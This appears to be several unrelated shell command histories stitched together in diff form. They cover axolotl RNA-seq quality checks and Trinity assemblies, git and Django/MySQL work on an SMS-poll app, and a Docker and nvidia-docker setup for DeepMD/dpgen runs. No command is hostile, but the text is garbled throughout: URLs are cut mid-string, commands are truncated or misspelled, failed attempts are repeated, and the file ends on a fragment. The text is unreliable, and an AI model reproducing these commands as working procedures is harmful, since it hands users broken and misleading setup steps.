/isitools/CentOS-5/perl5.10.1/lib/5.10.1/x86_64-linux-thread-multi-ld +vi /w4home/mikec/.bash_profile +ls -ltr /w4home/mikec/.bash_profile* +mv /w4home/mikec/.bash_profile /w4home/mikec/.bash_profile_OLD +echo $HOME +vi /isitools/.bash_profile +exit +echo $HOME +which perl +perl -V +vi /isitools/.bash_profile +exit +which fastqc +ls +ls +ls +pwd +ls +ls +ls -ltr +pwd +ls +find . -name "*.fq" +find .Axo* -name "*.fq" +find ./Axo* -name "*.fq" +find ./Axo* -name "*.fq" | fastqc --outdir=./fastQC_OUT/ +mkdir ./fastQC_OUT/ +find ./Axo* -name "*.fq" | fastqc --outdir=./fastQC_OUT/ +find ./Axo* -name "*.fq" | perl fastqc --outdir=./fastQC_OUT/ +find ./Axo* -name "*.fq" | perl /isitools/CentOS-5/FastQC/fastqc --outdir=./fastQC_OUT/ +perl /isitools/CentOS-5/FastQC/fastqc ./Axo_TC_ALL.fq --outdir=./fastQC_OUT/ +history |grep fastqc +perl /isitools/FastQC/fastqc ./Axo_TC_ALL.fq --outdir=./fastQC_OUT/ +bg +ls +which fastqc +top +ls -ltr +ls -ltr fastQC_OUT/ +fg +bg +ps axuww |grep fastqdc +ps axuww |grep fastqc +ls +history |grep fastqc +find ./Axo* -name "*.fq" | perl /isitools/CentOS-5/FastQC/fastqc --outdir=./fastQC_OUT/ +find ./Axo* -name "*.fq" | perl /isitools/FastQC/fastqc --outdir=./fastQC_OUT/ +ps auxww |grep fastqc +ls fastQC_OUT/ +fg +ls -ltr +mv nohup.out nohup_Trinity.out +ls trinity_out_dir/ +mv nohup_Trinity.out trinity_out_dir/nohup.out +ls +ls trinity_test/ +ls trinity_out_dir/ +ls -ltr trinity_test/ +ls -ltr +du -sch trinity_test/ +ls +ls fastQC_OUT/ +history |grep find |grep fastqc +find ./Axo_J_TC_* -name "*.fq" | perl /isitools/FastQC/fastqc --outdir=./fastQC_OUT/ +nohup perl /isitools/FastQC/fastqc ../Axo_TC_ALL.fq --outdir=./ +bg +ls -ltr +tail -f nohup.out +ls +history |grep find +find ./Axo* -name "*.fq" +which fastqc +echo $HOME +find ./Axo* -name "*.fq" | fastqc --outdir=./fastQC_OUT/ +find ./Axo* -name "*.fq" | perl fastqc --outdir=./fastQC_OUT/ +find ./Axo* -name "*.fq" | perl /isitools/CentOS-5/fastqc/fastqc --outdir=./fastQC_OUT/ +find ./Axo* -name "*.fq" | perl /isitools/fastqc/fastqc --outdir=./fastQC_OUT/ +man fastqc +/isitools/fastqc/fastqc --help +/isitools/CentOS-5/fastqc/fastqc --help +tail -f nohup.out +tail -f fastQC_OUT/nohup.out +tail no +ls -ltr +ls fastQC_OUT/ +cat fastQC_OUT/nohup.out +history |grep fasta +history |grep fastqc +history |grep fastqc |grep ALL +history |grep fastqc |grep ALL +pwd +ls +ls Axo_J_TC_0h/ +nohup find ./Axo_J_TC_* -name "*.fq" | perl /isitools/FastQC/fastqc --outdir=./ +/isitools/FastQC/fastqc --help +perl /isitools/FastQC/fastqc --help +perl /isitools/CentOS-5/FastQC/fastqc --help +rsync -a /isitools/FastQC/* /isitools/CentOS-5/FastQC/ +perl /isitools/CentOS-5/FastQC/fastqc --help +perl /isitools/FastQC/fastqc --help +history |grep perl |grep ALL +tail nohup.out +ps auxww |fastq |grep 5 +ps auxww |grep fastq |grep 5 +ls +tail nohup.out +ls Axo_J_TC_5d/ +head Axo_J_TC_5d/Axo_J_TC_5d.fq +ls -ltr Axo_J_TC_5d/Axo_J_TC_5d.fq +ls -ltr +chown -R mikec:mir * +sudo chown -R mikec:mir * +bg +sudo chown -R mikec:mir Axo_J_TC_5d/ +ls -ltr Axo_J_TC_5d/ +sudo chown -R mikec:mir Axo_J_TC_0h/ +history |grep fastqc |grep perl +tail -f nohup.out +tail -f nohup.out fastQC_OUT/ +ls -ltr fastQC_OUT/ +ls -ltr fastQC_OUT/nohup.out +tail fastQC_OUT/nohup.out +tail -f fastQC_OUT/nohup.out +ls -ltr +ls -ltr fastQC_OUT/ +du -sch fastQC_OUT/ +tail -f fastQC_OUT/nohup.out +ps axuww |grep fastqc |grep ALL +tail -f fastQC_OUT/nohup.out +history |grep Trinity.pl +pwd +ls +ls .. +ls ../.. +cat ../../convertFastqToFastaLeft.sh +../../convertFastqToFastaLeft.sh & +ls +../../convertFastqToFastaRight.sh & +ls -ltr +head axo_left.fq +zcat /isiseqruns/RonAxoTrinity/091113_Axo2PE_Eva/s_2_1/s_2_1.fq.gz |head +ls -ltr +ls -ltr +ls -ltr +ls -ltr +nohup /isitools/CentOS-5/trinity/Trinity.pl --seqType fa --JM 100G -left ./axo_left.fa --right ./axo_left.fa--CPU 24 --bflyHeapSpaceMax 2G --bflyCPU 8 --output /isiseqruns/RonAxoTrinity/AxoMikeTest/STDOUT/full_assembly/tissue_types/elbow & +ls -ltr +top +top -d 3 +ps auxww |grep Trinity +top -d 3 +history |grep perl +ls +ls +cat nohup.out_concat +history |grep convert +history |grep Trinity.pl +fg +bg +du -sch * +du -sch * +tail -f nohup.out +top +tail -f nohup.out +top +tail -f nohup.out +ls -ltr +ls -ltr chrysalis/ +du -sch * +ls -ltr +tail -f nohup.out +ls -ltr +ls -ltr +ls -ltr +history |grep Trinity.pl +nohup /isitools/CentOS-5/trinity/Trinity.pl --seqType fa --JM 100G -left ./axo_left.fa --right ./axo_left.fa--CPU 24 --bflyHeapSpaceMax 2G --bflyCPU 8 --output /isiseqruns/RonAxoTrinity/AxoMikeTest/STDOUT/full_assembly/tissue_types/Blastema/adult/ & +head nohup.out +cat nohup.out +ls -ltr +unlink left.fa +ls -ltr +rm -fr chrysalis/ Trinity.timing right.fa both.fa +ls +cat nohup.out +less nohup.out +ls +../../../convertFastqToFastaLeft.sh & +../../../convertFastqToFastaRight.sh & +ls -ltr +ls -ltr +du -sch axo_* +rm axo_right.fa +ls -ltr +ls -ltr +du -sch axo_left.f* +history +fg +ls +du -sch ax* +du -sch ../../../convertFastqToFastaLeft.sh & +du -sch ../../../convertFastqToFastaRight.sh & +../../../convertFastqToFastaLeft.sh & +../../../convertFastqToFastaRight.sh & +ls -ltr +ls -ltr +tail nohup.out +ls -ltr +ls -ltr +ls -ltr +ls -ltr +ls -ltr +ls -ltr +ps axuww |grep perl +ps auxww |grep Trinity.pl +ps axuww |grep perl +top +ls -ltr +ls -ltr +ls -ltr ../juvenile/ +ls -ltr ../juvenile/ +ls -ltr ../juvenile/ +ls -ltr ../juvenile/ +du -sch ../juvenile/* +du -sch ../juvenile/* +du -sch ../juvenile/* +ls -ltr +ls -ltr +history |grep Trinity.pl +nohup /isitools/CentOS-5/trinity/Trinity.pl --seqType fa --JM 100G -left ./axo_left.fa --right ./axo_left.fa--CPU 24 --bflyHeapSpaceMax 2G --bflyCPU 8 --output /isiseqruns/RonAxoTrinity/AxoMikeTest/STDOUT/full_assembly/tissue_types/Blastema/adult/ & +ls -ltr +ps auxww |grep Trinity.pl +ls +tail -f nohup.out +tail -f nohup.out +tail -f nohup.out +pwd +pwd +pwd +history |grep Trinity.pl +ls +ls +ls +nohup /isitools/CentOS-5/trinity/Trinity.pl --seqType fa --JM 100G -left ./axo_left.fa --right ./axo_left.fa --CPU 24 --bflyHeapSpaceMax 2G --bflyCPU 8 --output /isiseqruns/RonAxoTrinity/AxoMikeTest/STDOUT/full_assembly/tissue_types/Blastema/adult/ & +tail -f nohup.out +pwd +tail -f nohup.out +history |grep Trinity |grep -i elbo +tail -f nohup.out +fg +bg +ls +ls -ltr +ls ../adult_FAIL/ +cp ../adult_FAIL/concatAxoFastqFiles.sh . +ls +ls ../adult_FAIL/ +fg +ls +rm -fr * +cp ../adult_FAIL/concatAxoFastqFiles.sh . +vi concatAxoFastqFiles.sh +nohup concatAxoFastqFiles.sh & +tail -f nohup.out +ls -ltr +ls ../ +ls ../../ +ls ../../ +ls ../../../ +cat ../../../convertFastqToFastaLeft.sh +tail -f nohup.out +ls -ltr +../../../convertFastqToFastaLeft.sh & +../../../convertFastqToFastaRight.sh & +ls -ltr +ls -ltr +less nohup.out +tail -f nohup.out +ls -ltr +ps axuww |grep convert +ls -ltr +ps axuww |grep right +ps axuww |grep left +ls -ltr +top +history +ls -ltr +cat nohup.out +ls ../ +head ../juvenile_autopod/nohup.out +mv nohup.out nohup.out_concat +ls +ls -ltr +nohup /isitools/CentOS-5/trinity/Trinity.pl --seqType fa --JM 100G -left ./axo_left.fa --right ./axo_left.fa --CPU 24 --bflyHeapSpaceMax 2G --bflyCPU 8 --output /isiseqruns/RonAxoTrinity/AxoMikeTest/STDOUT/full_assembly/tissue_types/Blastema/adult/ & +tail -f nohup.out +head nohup.out +rm nohup.out +nohup /isitools/CentOS-5/trinity/Trinity.pl --seqType fa --JM 100G -left ./axo_left.fa --right ./axo_left.fa --CPU 24 --bflyHeapSpaceMax 1G --bflyCPU 8 --output /isiseqruns/RonAxoTrinity/AxoMikeTest/STDOUT/full_assembly/tissue_types/Blastema/adult/ & +tail -f nohup.out +ls -ltr +tail -f nohup.out +tail -f nohup.out +tail -f nohup.out +nohup /isitools/CentOS-5/trinity/Trinity.pl --seqType fa --JM 120G -left ./axo_left.fa --right ./axo_left.fa --CPU 24 --bflyHeapSpaceMax 1G --bflyCPU 8 --output /isiseqruns/RonAxoTrinity/AxoMikeTest/STDOUT/full_assembly/tissue_types/Blastema/adult/ & +tail -f nohup.out +ls +ls -ltt +ls -ltr +nohup /isitools/CentOS-5/trinity/Trinity.pl --seqType fa --JM 126G -left ./axo_left.fa --right ./axo_left.fa --CPU 24 --bflyHeapSpaceMax 5G --bflyCPU 8 --output /isiseqruns/RonAxoTrinity/AxoMikeTest/STDOUT/full_assembly/tissue_types/Blastema/adult/ & +tail -f nohup.out +history |grep mikec |grep run +echo $PATH +echo $HOME +source /isitools/.bash_profile +echo $PERL_LOCAL_LIB_ROOT +vi /w4home/mikec/.bash_profile_O +history |grep -i bcl +exit +cp ../juvenile_autopod/concatAxoFastqFiles.sh . +vi concatAxoFastqFiles.sh +nohup ./concatAxoFastqFiles.sh & +tail -f nohup.out +ls -ltr +../../../convertFastqToFastaLeft.sh & +ls -ltr +cat concatAxoFastqFiles.sh +ls -ltr +ps axuww |grep perl +ls -ltr +mv axo_left.fa single.fa +top -d 5 +top -d 10 +id +top -d 10 +history |grep Trinity.pl |grep adult +echo $HOME +echo $PYTHON_PATH +python +echo $PYTHON_PATH +whichp erl +which perl +perl -V +pwd +perl -MCPAN -e shell +sudo su +id +pwd +;s +ls +cp ../adult/concatAxoFastqFiles.sh . +ls +vi concatAxoFastqFiles.sh +nohup ./concatAxoFastqFiles.sh & +t +tail -f nohup.out +ls -ltr +tail -f nohup.out +ls +ls -ltr +tail -f nohup.out +ls -ltr +ps axuww |grep concat +ls -ltr +ps axuww |grep fq +ls +../../../convertFastqToFastaLeft.sh & +ls -ltr +pwd +ls -ltr /isiseqruns/RonAxoTrinity/AxoMikeTest/STDOUT/full_assembly/tissue_types/ +find /isiseqruns/RonAxoTrinity/AxoMikeTest/STDOUT/full_assembly/tissue_types/ -name "*.fq" |grep "Dist|elbow|Autopod|Prox" +find /isiseqruns/RonAxoTrinity/AxoMikeTest/STDOUT/full_assembly/tissue_types/ -name "*.fq" +find /isiseqruns/RonAxoTrinity/AxoMikeTest/STDOUT/full_assembly/tissue_types/ -name "*.fq" |grep -E (Dist|elbow|Autopod|Prox) +find /isiseqruns/RonAxoTrinity/AxoMikeTest/STDOUT/full_assembly/tissue_types/ -name "*.fq" |grep -E '(Dist|elbow|Autopod|Prox)' +find /isiseqruns/RonAxoTrinity/AxoMikeTest/STDOUT/full_assembly/tissue_types/ -name "*.fq" |grep -E '(Dist|elbow|Autopod|Prox)' |xargs du -sch +find /isiseqruns/RonAxoTrinity/AxoMikeTest/STDOUT/full_assembly/tissue_types/ -name "*.fq" |xargs du -sch +find /isiseqruns/RonAxoTrinity/AxoMikeTest/STDOUT/full_assembly/tissue_types/ -name '("*.fq"|"*.fa")' |xargs du -sch +find /isiseqruns/RonAxoTrinity/AxoMikeTest/STDOUT/full_assembly/tissue_types/ -name '("*.fq"&"*.fa")' |xargs du -sch +find /isiseqruns/RonAxoTrinity/AxoMikeTest/STDOUT/full_assembly/tissue_types/ -name '("*.fq" && "*.fa")' |xargs du -sch +find /isiseqruns/RonAxoTrinity/AxoMikeTest/STDOUT/full_assembly/tissue_types/ -name "*.fa" |xargs du -sch +ps axuww |grep perl +fg +bg +ps axuww |grep convert +ps axuww |grep perl +pwd +ls +ls -ltr +ls ../../Digits/ +ls -ltr ../../Digits/ +fg +ls +ls -ltr +ps auxww |grep concat +ls -ltr +ps auxww |grep concat +lsof -i :2675 +history +ls -ltr +du -sch axo_left.f* +cat nohup.out +ls +ls -tlr +cat nohup.out +less nohup.out +ls -ltr +rm -fr axo_left.fa +../../../convertFastqToFastaLeft.sh & +ls -ltr +du -sch *.fa +mount +top +ifconfig +iftop -i p1p1 +sudo iftop -i p1p1 +du -sch * +ps axwwu |grep convert +ps axwwu |grep concat +ls -ltr +du -sch *.fa +ls -ltr +top -d 5 +ls +ls +ls +mkdir juvenile_autopod juvenile_zeugopod +cp ../../Stylopod/concatAxoFastqFiles.sh . +ls +vi concatAxoFastqFiles.sh +nohup ./concatAxoFastqFiles.sh & +tail -f nohup.out +top +tail -f nohup.out +ls -ltr +../../../convertFastqToFastaLeft.sh +bg +ls -ltr +top +ls -ltr +ls +mv axo_left.fa single.fa +mv nohup.out nohup.out_concat +ls +cat /proc/cpuinfo +nohup /isitools/trinity/Trinity.pl --seqType fa --JM 30G --single ./single^Ca --CPU 16 --bflyHeapSpaceMax 1G --bflyCPU 6 --output /isiseqruns/RonAxoTrinity/AxoMikeTest/STDOUT/full_assembly/tissue_types/Blastema/juvenile_autopod/ & +ls -ltr +tail -f nohup.out +ls chrysalis/ +tail -f nohup.out +ls -ltr +cat Trinity.fasta +ls -ltr +ls +id +history |grpe Trinity.pl +history |grep Trinity.pl |grep adult +top -d 3 +ls +mkdir temp +rsync -a ftp:/var/www/drupal-6.22_axolotl.morgridge.net/sites/default/files ./filesFromWeb +bg +ls +ls filesFromWeb/ +ls filesFromWeb/files/ +du -sch filesFromWeb/files/ +ps axuww |grep rsync +du -sch filesFromWeb/files/ +ls -ltr /isiseqruns/RonAxoTrinity/AxoMikeTest/STDOUT/full_assembly/tissue_types/Blastema/juvenile +ls -ltr /isiseqruns/RonAxoTrinity/AxoMikeTest/STDOUT/full_assembly/tissue_types/Blastema/juvenile_FAIL/ +ls +ls +ls Peng_temp_transfer/ +cat Peng_temp_transfer/Run_All.sh +ls -ltr +ls -ltr 130524_SN1057_0126_BD1EWUACXX +cat 130524_SN1057_0126_BD1EWUACXX/Peng_Run_CASAVA.sh +cp 130524_SN1057_0126_BD1EWUACXX/Peng_Run_CASAVA.sh /tmp/ +ls +scp /tmp/Peng_Run_CASAVA.sh ehmsea:~/Downloads +which perl +echo $HOME +perl -MCPAN -e shell +perl -MCPAN -e shell +pwd +ls +ls +make clean +perl Makefile.PL +make -j 32 +make install +ls -ltr /isitools/CentOS-5/perl5.10.1/lib/5.10.1/lib/perl5/x86_64-linux-thread-multi-ld/perllocal.pod +ls -ltr /isitools/CentOS-5/perl5.10.1/lib/5.10.1/lib/perl5/x86_64-linux-thread-multi-ld/perllocal.pod +ls -ltr /isitools/CentOS-5/perl5.10.1/lib/5.10.1/lib/perl5/x86_64-linux-thread-multi-ld/XML/ +ls +echo $HOME +which perl +perl -MCPAN -e shell +history |grep -i bcl +which perl +echo $HOME +pwd +ls +pwd +nohup ./concatAxoFastqFiles.sh & +tail -f nohup.out +ls -ltr +../../convertFastqToFastaLeft.sh & +../../convertFastqToFastaRight.sh & +ls -ltr +ls +mv blastema/ Blastema +mkdir Blastema/{juvenile,adult} +ls -ltr +ls +ls +cp ../../Stylopod/concatAxoFastqFiles.sh . +vi concatAxoFastqFiles.sh +ls +nohup ./concatAxoFastqFiles.sh & +tail -f nohup.out +pwd +tail -f nohup.out +ls -ltr +tail -f nohup.out +ls -ltr +tail -f nohup.out +history\ +history +tail -f nohup.out +pwd +tail -f nohup.out +ls -ltr +ls /isiseqruns/RonAxoTrinity/AxoMikeTest/STDOUT/full_assembly/tissue_types/Stylopod/ +ls +ls -ltr +ps axuww |grep concat +fg +bg +pwd +ps axuww |grep Digit +ls -ltr +history +ls -ltr +tail nohup.out +ls -ltr +du -sch axo_* +fg +df -h +ls +rm -fr axo_* +bg +df -h +ls -ltr +vi nohup.out +vi concatAxoFastqFiles.sh n +ls +nohup ./concatAxoFastqFiles.sh & +tail -f nohup.out +fg +ls +ls -ltr +rm nohup.out +vi concatAxoFastqFiles.sh +nohup ./concatAxoFastqFiles.sh & +ls +ta nohup.out +tail nohup.out +less nohup.out +rm nohup.out +nohup ./concatAxoFastqFiles.sh & +less nohup.out +vi concatAxoFastqFiles.sh +rm nohup.out +nohup ./concatAxoFastqFiles.sh & +less nohup.out +vi concatAxoFastqFiles.sh +rm nohup.out +nohup ./concatAxoFastqFiles.sh & +less nohup.out +rm nohup.out +vi concatAxoFastqFiles.sh +ls +nohup ./concatAxoFastqFiles.sh & +tail -f nohup.out +ls -ltr +top +ps axuww |grep perl +ps -ef |grep perl +pwd +ls -ltr +ls +vi concatAxoFastqFiles.sh +rm nohup.out +nohup ./concatAxoFastqFiles.sh & +less concatAxoFastqFiles.sh +less nohup.out +vi concatAxoFastqFiles.sh +ls -ltr +rm nohup.out +nohup ./concatAxoFastqFiles.sh & +tail -f nohup.out +ls -ltr +tail -f nohup.out +ls -ltr +../../convertFastqToFastaLeft.sh & +../../convertFastqToFastaRight.sh & +ls -ltr +ps axuww |grep perl +ls -ltr +nohup /isitools/CentOS-5/trinity/Trinity.pl --seqType fa --JM 28G -left ./axo_left.fa --right ./axo_left.fa --CPU 16 --bflyHeapSpaceMax 1G --bflyCPU 6 --output /isiseqruns/RonAxoTrinity/AxoMikeTest/STDOUT/full_assembly/tissue_types/Stylopod/ & +ls -ltr +ls +fg +uname -a +cat /etc/issue +ls +ls -ltr +unlink right.fa +unlink left.fa +rm both.fa +ls nohup.out +less nohup.out +vi nohup.out +ls +mv nohup.out nohup.out_concat +ls +rm -fr chrysalis/ Trinity.timing +ls -ltr +history |grep Trinity.pl +nohup /isitools/trinity/Trinity.pl --seqType fa --JM 28G -left ./axo_left.fa --right ./axo_left.fa --CPU 16 --bflyHeapSpaceMax 1G --bflyCPU 6 --output /isiseqruns/RonAxoTrinity/AxoMikeTest/STDOUT/full_assembly/tissue_types/Stylopod/ & +tail -f nohup.out +ls -ltr +nohup /isitools/trinity/Trinity.pl --seqType fa --JM 30G -left ./axo_left.fa --right ./axo_left.fa --CPU 16 --bflyHeapSpaceMax 1G --bflyCPU 6 --output /isiseqruns/RonAxoTrinity/AxoMikeTest/STDOUT/full_assembly/tissue_types/Stylopod/ & +tail -f nohup.out +fg +ls -ltr +history +tail -f nohup.out +ls +id +history |grep Trinity.pl +history |grep Trinity.pl |grep adult +ls +cat ../adult_FAIL/Trinity.timing +pwd +ls +ls -ltr Elbow/ +mv Elbow/ Elbow_FAIL +mkdir Elbow +mv ../Elbow_FAIL/axo_*.fa . +ls + nohup /isitools/CentOS-5/trinity/Trinity.pl --seqType fa --JM 30G -left ./axo_left.fa --right ./axo_left.fa --CPU 8 --bflyHeapSpaceMax 1G --bflyCPU 4 --output /isiseqruns/RonAxoTrinity/AxoMikeTest/STDOUT/full_assembly/tissue_types/elbow & +tail -f nohup.out +ls -ltr + nohup /isitools/CentOS-5/trinity/Trinity.pl --seqType fa --JM 28G -left ./axo_left.fa --right ./axo_left.fa --CPU 8 --bflyHeapSpaceMax 1G --bflyCPU 4 --output /isiseqruns/RonAxoTrinity/AxoMikeTest/STDOUT/full_assembly/tissue_types/elbow & +ls +tail -f nohup.out +pwd +ls +ls +ls -ltr +less Trinity.timing +ls +less Trinity. +less Trinity.timing +pwd +ls +cat concatAxoFastqFiles.sh +du -sch single.fa +ls -ltr +du -sch single.fa +ls +ls +mv juvenile juvenile_FAIL +ls +mkdir juvenile +ls +ls juvenile_FAIL/ +cp juvenile_FAIL/concatAxoFastqFiles.sh . +cat concatAxoFastqFiles.sh +vi concatAxoFastqFiles.sh +nohup ./concatAxoFastqFiles.sh & +ls +fg +ls +ls +mv ../concatAxoFastqFiles.sh . +ls +rm axo_left.fq +ls +pwd +vi concatAxoFastqFiles.sh +ls +nohup ./concatAxoFastqFiles.sh & +tail nohup.out +tail -f nohup.out +pwd +tail -f nohup.out +ls +ls -ltr +ehad jellyfish.kmers.fa +head jellyfish.kmers.fa +ls +ls -ltr +ls *kmer* +cat inchworm.kmer_count +head jellyfish.kmers.fa +cat jellyfish.kmers.fa +ls -ltr +ls ../juvenile/ +ls ../juvenile/single.fa +ls -ltr ../juvenile/single.fa +ls -ltr ../juvenile/*.fa +cat /etc/issue +ls +python -v +easy_install +easy_install --version +easy_install PIL +sudo easy_install PIL +ls +exit +ls +vim test.py +ls +python test.py +ls +sudo apt-get install git +sudo yum install git +ls +git init +git add . +git commit -m "my first commit" +git config --global user.email "administrator@nenryo10.net" +git config --global user.name "TetsuoS" +git remote add originsuoS/python_PIL.git +git push -u origin master + +git commit -m "my first commit" +git remote add originsuoS/python_PIL.git +git remote rm origin +git remote add originsuoS/python_PIL.git +git push -u origin master +ls +rm -rf .git +ls +git init +git add . +git commit -m "my first commit" +ls +exit +exit +logout +git status +ls +ls -a +ls +logout +git status +git add . +git commit -m "add labels & calculations" +ls +ls -a +ls +git status +git add . +ls -a +logout +pip install ipynb +conda env list +anaconda +env +source activate myenv +source activate python3 +bin/source activate python3 +source venv/bin/activate +source python3/bin/activate +python +python3-config +python3-jsonschema +python --version +pipenv +python +whereis python +lsvirtualenv -b +virtualenv +ls virtualenv -b +virtualenv -b +virtualenv +lsvirtualenv +ls +ls +ls +ls +source activate python3 +jupyter-kernelspec +jupyter-kernel +ls +ls +git status +git add . +git commit -m "refactor & add dataprocess class" +exit() exit() +git status +git add . +git commit -m "add ERC20 datasets" +exit +exi +exit +python manage.py syncdb +ls +ls +ld +ls +unzip +unzip flat_tab_widget.zip +ls +sudo mv /templates/login/web /static/login +mv /templates/login/web /static/login +mv web /static/login +mv /web /static/login +ls +ls +ls +python tests.py +python /login/tests.py +python login/tests.py +python login/tests.py +python tests.py +python manage.py shell +python manage.py shell +export DJANGO_SETTINGS_MODULE=SMSpoll.settings +python tests.py +python tests.py +python login/tests.py +export PYTHONPATH=$PYTHONPATH:$PWD +python tests.py +export PYTHONPATH=$PYTHONPATH:$PWD +python login/tests.py +cat ys.path +cat sys.path +export PYTHONPATH=$PYTHONPATH:$PWD +python tests.py +python manage.py test login +python manage.py test login +mysql +mysql -u root +mysql -u root -p +python manage.py test login +python manage.py syncdb +python manage.py test login +mysql +mysql -ussdiprojectfall2 -hmysql.server -p +GRANT ALL PRIVILEGES ON * . * TO 'ssdiprojectfall2'; +GRANT ALL PRIVILEGES ON *.* TO 'ssdiprojectfall2'; +grant all; +mysql -ussdiprojectfall2 -hmysql.server -p +sudo python manage.py tests +sudo python manage.py test +sudo python manage.py test login +sudo python manage.py test login +sudo python manage.py test +sudo su +exit +sudo su +su +su sudo +su python manage.py syncdb +sudo python manage.py syncdb +python manage.py syncdb +python manage.py syncdb +python manage.py test +./tests.py +./tests.py +sudo ./tests.py +python tests.py +python manage.py test login +python manage.py test login +python manage.py test +./manage.py test +python manage.py test login +python manage.py test +git add -A +git remote add origin +git init +git add README.md +git add README.md +git commit -m "first commit" +git config --global user.email "kedar.kulkarni0@gmail.com" +git config --global user.name "kedark3" +git commit -m "first commit" +git Add - A +git Add -A +git remote add origin +git push -u origin master +echo # SMSpoll >> README.md +git add README.md +ls +ls +ls -a +ls -a +git commit -m "first commit" +git add -a +git add -A +git commit -m "first commit" +git remote add origin +git push -u origin master +ls +python manage.py syncdb +python manage.py syncdb +pip install twilio +pip install twilio --upgrade +python +mkvirtualenv --python=/usr/bin/python2.7 newtwilio +pip install twilio +git add -A +git commit -m "For release 2" +git push -u origin master +select *from createTest +select * from CreateTest +select *from CreateTest +python manage.py syncdb +python manage.py syncdb +python +ssh -L 8002:localhost:8001 aerialist@ssh.pythonanywhere.com +ssh -L 8002:localhost:8001 ssdiprojectfall2015@ssh.pythonanywhere.com +python +git add -A +git commit -m "Before any mess happens" +git push -u origin master +ssh +ssh ssdiprojectfall2015.pythonanywhere.com +git add -A +git commit -m "Final Commit" +git push -u origin-master +git push -u origin master +#1567157720 +ls +#1567157728 +exit +#1567159541 +sudo yum install -y yum-utils device-mapper-persistent-data lvm2 +#1567159794 +yum install vim +#1567159840 +sudo yum-config-manager --add-repo s.ustc.edu.cn/docker-ce/linux/centos/docker-ce.repo +#1567159847 +sudo yum makecache fast +#1567159857 +sudo yum install docker-ce +#1567159958 +sudo systemctl enable docker +#1567159963 +sudo systemctl start docker +#1567159981 +docker run hello-world +#1567159992 +docker image ls +#1567160002 +docker ps -a +#1567160009 +docker container prune +#1567160021 +docker image rm fce2 +#1567160025 +docker image ls +#1567160037 +sudo curl -L se/releases/download/1.24.1/docker-compose-$(uname -s)-$(uname -m)" -o /usr/local/bin/docker-compose +#1567160068 +clear +#1567160083 +yum install wget +#1567160104 +wget -c se/releases/download/1.24.1/docker-compose-$(uname -s)-$(uname -m)" +#1567160175 +sudo curl -L se/releases/download/1.24.1/docker-compose-$(uname -s)-$(uname -m)" -o /usr/local/bin/docker-compose +#1567160228 +sudo chmod +x /usr/local/bin/docker-compose +#1567160237 +nvidia-smi +#1567160262 +docker volume ls -q -f driver=nvidia-docker | xargs -r -I{} -n1 docker ps -q -a -f volume={} | xargs -r docker rm -f +#1567160272 +sudo yum remove nvidia-docker +#1567160279 +distribution=$(. /etc/os-release;echo $ID$VERSION_ID) +#1567160285 +curl -s -Lstribution/nvidia-docker.repo | sudo tee /etc/yum.repos.d/nvidia-docker.repo +#1567160297 +sudo yum install -y nvidia-docker2 +#1567160333 +sudo pkill -SIGHUP dockerd +#1567160339 +docker run --runtime=nvidia --rm nvidia/cuda:9.0-base nvidia-smi +#1567160363 +docker ps +#1567160367 +docker image ls +#1567160377 +docker image rm 1443 +#1567160380 +ls +#1567160383 +df +#1567160459 +vim /etc/docker/daemon.json +#1567160488 +sudo systemctl daemon-reload +#1567160494 +sudo systemctl restart docker +#1567160495 +ls +#1567160522 +docker pull cloudac7/deepmd-kit:cuda-9.0-ssh +#1567161137 +exit +#1567168507 +docker pull cloudac7/cgcnn:cuda-10.0-notebook +#1567168957 +docker pull cloudac7/gdynet':cuda-10.0-notebook +#1567168961 +docker pull cloudac7/gdynet:cuda-10.0-notebook +#1567170025 +docker pulllibatomsquip/quip:py2 +#1567170029 +docker pull libatomsquip/quip:py2 +#1567175052 +exit +#1567166134 +docker pull cloudac7/deepmd-kit:cuda-9.0-ssh +#1567166865 +docker pull cloudac7/dpgen +#1567167336 +docker pull cloudac7/cp2k:v6.1 +#1567167656 +docker pull cloudac7/sisso:notebook +#1567177210 +df +#1567177220 +docker image ls +#1567179732 +ls +#1567180926 +#1567180926 +s +#1567180927 +ls +#1567180943 +rm -r cp2k_dpgen +#1567180952 +rm -rf cp2k_dpgen.bak +#1567180954 +rm -rf cp2k_dpgen.bak-1/ +#1567180958 +rm -rf cp2k_dpgen.old/ +#1567180959 +ls +#1567180963 +#1567180965 +vim param.json +#1567180983 +vim machine_final_all.json +#1567180987 +ls +#1567180989 +vim docker-compose.yml +#1567181019 +chmod +x clean.sh +#1567181021 +./clean.sh +#1567181022 +ls +#1567181028 +chmod +x command.sh +#1567181032 +vim command.sh +#1567181037 +rm command.sh +#1567181039 +ls +#1567181044 +vim exec.sh +#1567181060 +chmod +x exec.sh +#1567181061 +ls +#1567181064 +vim param.json +#1567181120 +./exec.sh +#1567181126 +nvidia-smi +#1567181131 +ls +#1567181138 +tail -f dpgen.log +#1567182280 +ls +#1567182284 +#1567182285 +ls +#1567182295 +#1567182299 +tail lcurve.out +#1567182304 +vim lcurve.out +#1567183335 +#1567183348 +tail */lcurve.out +#1567212777 +clear +#1567212784 +nvidia-smi +#1567212788 +ls +#1567212794 +#1567212795 +ls +#1567212826 +tail dpgen.log +#1567212846 +df +#1567212903 +tail iter.000001/00.train/000/lcurve.out +#1567212910 +tail iter.000001/00.train/00*/lcurve.out +#1567212921 +tail iter.000000/00.train/00*/lcurve.out +#1567213004 +ls +#1567213011 +#1567213020 +wc -l candidate.shuffled.000.out +#1567213034 +#1567213044 +wc -l iter.000001/02.fp/candidate.shuffled.001.out +#1567213070 +wc -l iter.000001/02.fp/*.001.out +#1567213092 +wc -l iter.000000/02.fp/*.001.out +#1567213097 +wc -l iter.000000/02.fp/*.000.out +#1567213120 +exit +#1567217673 +clear +#1567217683 +ls +#1567217689 +#1567217690 +ls +#1567217695 +rm cp2k_dpgen.tgz +#1567217701 +rm -r stored/ +#1567217710 +rm -rf stored/ +#1567217715 +ls +#1567217863 +#1567217863 +ls +#1567217865 +#1567217866 +ls +#1567217869 +#1567217871 +ls +#1567217907 +nvidia-smi +#1567217981 +exit +#1567218016 +ls +#1567218018 +rm cp2k_dpgen_1.tgz +#1567218075 +tar -jcvf dp-tut.tar.bz2 deepmd-tutorial-20190815/ +#1567218091 +ls +#1567218136 +yum install zip +#1567218186 +ls +#1567218263 +docker ps +#1567218267 +#1567218270 +docker-compose down +#1567218273 +ls +#1567218274 +#1567218275 +ls +#1567218278 +#1567218278 +ls +#1567218282 +rm dp-tut.tar.bz2 +#1567218291 +rm -rf deepmd-tutorial-20190815/ +#1567218292 +ls +#1567218410 +docker ps +#1567218412 +docker ps -a +#1567218416 +docker image ls +#1567218433 +yum install git +#1567218494 +wgetsh 